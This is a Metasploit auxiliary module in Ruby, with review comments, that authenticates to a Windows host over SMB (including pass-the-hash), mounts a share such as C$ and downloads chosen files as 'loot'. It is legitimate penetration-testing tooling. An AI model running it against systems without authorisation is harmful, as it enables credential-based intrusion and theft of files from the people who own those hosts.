Path: blob/master/modules/auxiliary/admin/smb/download_file.rb
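##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module that reads one or more files from an SMB share and records
# each of them as loot. It either authenticates through the framework's SMB
# client mixins or reuses an SMB session that is already established.
class MetasploitModule < Msf::Auxiliary

  # Exploit mixins should be called first
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Exploit::Remote::SMB::Client::RemotePaths
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::OptionalSession::SMB

  # Declares the module metadata and registers the SMBSHARE option
  # (required, default 'C$').
  def initialize
    super(
      'Name' => 'SMB File Download Utility',
      'Description' => %(
        This module downloads a file from a target share and path. The usual reason
        to use this module is to work around limitations in an existing SMB client that may not
        be able to take advantage of pass-the-hash style authentication.
      ),
      'Author' => [
        'mubix' # copied from hdm upload_file module
      ],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        # NOTE(review): declared empty, but an authenticated SMB logon and share
        # access are normally written to the target's audit log when auditing
        # is enabled; confirm whether IOC_IN_LOGS belongs here.
        'SideEffects' => [],
        'Reliability' => []
      }
    )

    register_options([
      OptString.new('SMBSHARE', [true, 'The name of a share on the RHOST', 'C$'])
    ])
  end

  # Connects to the configured share and stores every path returned by
  # remote_paths as loot.
  #
  # A Rex::Proto::SMB::Exceptions::ErrorCode raised for one path is logged and
  # printed, and the loop carries on with the next path. Any other exception
  # propagates to the caller.
  #
  # @return [void]
  def smb_download
    vprint_status('Connecting...')
    if session
      # Reuse the client of the supplied session instead of logging in again.
      print_status("Using existing session #{session.sid}")
      self.simple = session.simple_client
    else
      connect
      smb_login
    end

    # Build the UNC path once so the status message and the connect call agree.
    # The original message ended with an unmatched single quote; it is dropped.
    share_unc = "\\\\#{simple.address}\\#{datastore['SMBSHARE']}"
    vprint_status("Mounting the remote share #{share_unc}...")
    simple.connect(share_unc)

    remote_paths.each do |remote_path|
      vprint_status("Trying to download #{remote_path}...")

      fd = simple.open(remote_path.to_s, 'o')
      begin
        # read is called without a length, so presumably the whole file is held
        # in memory before it is stored; very large files may be costly (confirm).
        data = fd.read
      ensure
        # Always release the remote handle, even when the read fails.
        fd.close
      end

      # Use only the last backslash-separated component as the loot file name.
      # to_s mirrors the conversion applied when the path is opened above.
      fname = remote_path.to_s.split('\\').last
      path = store_loot('smb.shares.file', 'application/octet-stream', rhost, data, fname)
      print_good("#{remote_path} saved as: #{path}")
    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
      elog("Unable to download #{remote_path}:", error: e)
      print_error("Unable to download #{remote_path}: #{e.message}")
    end
  end

  # Per-host entry point: validates the remote path options, then runs the
  # download. A login failure is logged and printed rather than raised.
  #
  # @param _ip [String] host address supplied by the caller; unused here
  # @return [void]
  def run_host(_ip)
    validate_rpaths!

    begin
      smb_download
    rescue Rex::Proto::SMB::Exceptions::LoginError => e
      elog("Unable to login: #{e.message}", error: e)
      print_error("Unable to login: #{e.message}")
    end
  end
end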